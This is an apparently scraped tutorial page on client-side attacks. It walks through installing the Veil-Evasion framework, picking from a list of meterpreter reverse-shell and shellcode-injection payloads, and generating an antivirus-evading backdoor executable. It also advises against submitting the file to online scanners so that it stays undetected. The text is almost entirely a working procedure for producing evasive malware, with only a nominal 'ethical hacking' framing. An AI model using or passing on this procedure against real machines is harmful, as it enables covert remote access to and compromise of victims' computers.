Ethical Hacking - GAINING ACCESS(10)
阅读原文时间:2023年07月10日阅读:1

CLIENT SIDE ATTACKS

  • Use if server-side attacks fail.
  • If IP is probably useless.
  • Require user interaction.
  • Social engineering can be very useful.
  • Information gathering is vital.

Generating an undetectable backdoor using VEIL-EVASION

https://github.com/Veil-Framework/Veil

1. Install veil-evasion

apt-get install veil-evasion

OR

apt -y install veil

/usr/share/veil/config/setup.sh --force --silent

OR

sudo apt-get -y install git
git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent

2. Run veil-evasion

./Veil.py

Choose evasion tool:

3. Select a backdoor/payload

use [payload number]

List all the available payloads.

[*] Available Payloads:

1)    autoit/shellcode\_inject/flat.py

2)    auxiliary/coldwar\_wrapper.py  
3)    auxiliary/macro\_converter.py  
4)    auxiliary/pyinstaller\_wrapper.py

5)    c/meterpreter/rev\_http.py  
6)    c/meterpreter/rev\_http\_service.py  
7)    c/meterpreter/rev\_tcp.py  
8)    c/meterpreter/rev\_tcp\_service.py

9)    cs/meterpreter/rev\_http.py  
10)    cs/meterpreter/rev\_https.py  
11)    cs/meterpreter/rev\_tcp.py  
12)    cs/shellcode\_inject/base64.py  
13)    cs/shellcode\_inject/virtual.py

14)    go/meterpreter/rev\_http.py  
15)    go/meterpreter/rev\_https.py  
16)    go/meterpreter/rev\_tcp.py  
17)    go/shellcode\_inject/virtual.py

18)    lua/shellcode\_inject/flat.py

19)    perl/shellcode\_inject/flat.py

20)    powershell/meterpreter/rev\_http.py  
21)    powershell/meterpreter/rev\_https.py  
22)    powershell/meterpreter/rev\_tcp.py  
23)    powershell/shellcode\_inject/psexec\_virtual.py  
24)    powershell/shellcode\_inject/virtual.py

25)    python/meterpreter/bind\_tcp.py  
26)    python/meterpreter/rev\_http.py  
27)    python/meterpreter/rev\_https.py  
28)    python/meterpreter/rev\_tcp.py  
29)    python/shellcode\_inject/aes\_encrypt.py  
30)    python/shellcode\_inject/arc\_encrypt.py  
31)    python/shellcode\_inject/base64\_substitution.py  
32)    python/shellcode\_inject/des\_encrypt.py  
33)    python/shellcode\_inject/flat.py  
34)    python/shellcode\_inject/letter\_substitution.py  
35)    python/shellcode\_inject/pidinject.py  
36)    python/shellcode\_inject/stallion.py

37)    ruby/meterpreter/rev\_http.py  
38)    ruby/meterpreter/rev\_https.py  
39)    ruby/meterpreter/rev\_tcp.py  
40)    ruby/shellcode\_inject/base64.py  
41)    ruby/shellcode\_inject/flat.py

Choose a specific payload.

4. Set options

set [option][value]

5. Generate backdoor

generate

Generate a new backdoor successfully.    /var/lib/veil/output/compiled/backdoor.exe.exe

Be careful: Don't submit to any online scanner! And don't use it illegally!

手机扫一扫

移动阅读更方便

阿里云服务器
腾讯云服务器
七牛云服务器

你可能感兴趣的文章